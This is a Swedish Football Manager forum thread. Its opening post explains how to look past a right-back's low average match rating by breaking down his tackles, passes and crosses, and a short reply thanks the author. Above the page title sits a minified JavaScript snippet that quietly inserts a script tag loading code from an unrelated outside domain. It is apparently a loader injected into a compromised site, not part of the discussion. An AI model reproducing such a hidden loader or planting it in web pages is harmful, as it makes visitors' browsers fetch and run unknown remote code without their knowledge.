;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Snittbetyg – Guider & annat – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

Snittbetyg

2 Inlägg
2 Users
14 Likes
1,398 Visningar
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Jag diskuterade taktik med en god vän för några dagar sedan där vi landade i att vissa positioner, vilken spelare han näst intill spelar där, inte presterar baserat på snittbetyget. Det kan såklart bero på att spelarna inte länkar ihop optimalt i taktiken, att spelarna inte är optimala för taktiken - eller att man stirrar sig blint på snittbetyget både under och mellan matcherna. Vi landade i att det finns väldigt mycket att hämta ur ett snittbetyg förutsatt att man bryter ner den och med de verktygen som finns på FM idag så är det relativt enkelt att få fram en annan uppfattning om en spelare i jämförelse med summeringen snittbetyg.

Jacob Olsson är min högerback och vid första anblick så är han riktigt dålig - hans snittbetyg efter 7 matcher ligger på 6,74. Det är ett direkt dåligt betyg i mina och säkert dina ögon också. Min första tanke är såklart att han inte ska spela nästa match för de andra spelarna har ett betydligt bättre snittbetyg. Det kan såklart bero på flera anledningar och här nedan kommer jag att förklara närmre varför jag kommer att fortsätta att spela med Jacob i de kommande matcherna.

Först och främst, vad är Jacobs primära uppgift på planen? Att försvara. För mig är det då inte aktuellt med mer offensiva insatser och när han väl beger sig uppåt banan så kanske jag inte ska förvänta mig något extraordinärt heller. Om du tittar nere till vänster på bilden så ser du "Lyckade inlägg / Inlägg sammanlagt" där han lyckats med 5 av 35 inlägg. Det är direkt dåligt och sannolikt en stor anledning till varför hans snittbetyg är så lågt - han misslyckas ju så gott som hela tiden med sina inlägg.

Det finns en personlig instruktion som heter "Slå färre inlägg" som jag då skulle kunna implementera på Jacob då det känns angeläget att försöka få honom att undvika inlägg.'

Vi går vidare. Nu vet vi att jag ser honom som en defensiv spelare snarare än en offensiv. Hur många tacklingar har han vunnit? Till höger på bilden så ser vi att han har vunnit 13 - av 13. Vi snackar om en spelare som på den viktigaste biten för hans del är 100%-ig, det går ju inte att bli bättre än så. Och i en försvarande roll kan man både spela och rensa en boll. Ser vi till passningar, som är centralt på bilden, så ligger han på 74% lyckade passningar - 227 av 305 - vilket jag ser som helt okej, varken bättre eller sämre. Det kan ju vara som så att hälften av de misslyckade passningarna är långa uppspelsbollar(vi vet att detta förekommer ofta på FM) och då kan vi räkna bort de som offensiva passningar. För mig vill jag att han passar till närmsta gubbe eller åtminstone ett snäpp uppåt i banan till en inner- eller yttermittfältare. Att få det översatt på FM är desto svårare även om man ber dem spela korta passningar.

Om vi då ska runda av och summera hur man faktiskt läser av snittbetygs-vyn så anser jag att Jacob Olsson är en bra defensiv spelare på planen, han har ju lyckats prestera på de plan jag vill att han ska göra bra ifrån sig på. Offensivt kan man lämna mycket att önska såklart, men samtidigt har jag ju andra spelare på planen som ska genomföra de offensiva uppgifterna. Då tänker jag snarare att jag behöver arbeta bort eller minimera situationerna som Jacob sätts i offensivt eller få honom att förstå att andra spelare är bättre lämpade för uppgiften han ställs inför.


   
jonneperre, Micke, TommyE and 3 people reacted
Citera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

Mycket givande läsning som vanligt, Danne. Det får en att tänka till mer kring hur saker och ting fungerar.

"I have never played for a draw in my life." - Sir Alex Ferguson


   
SvaraCitera
Share: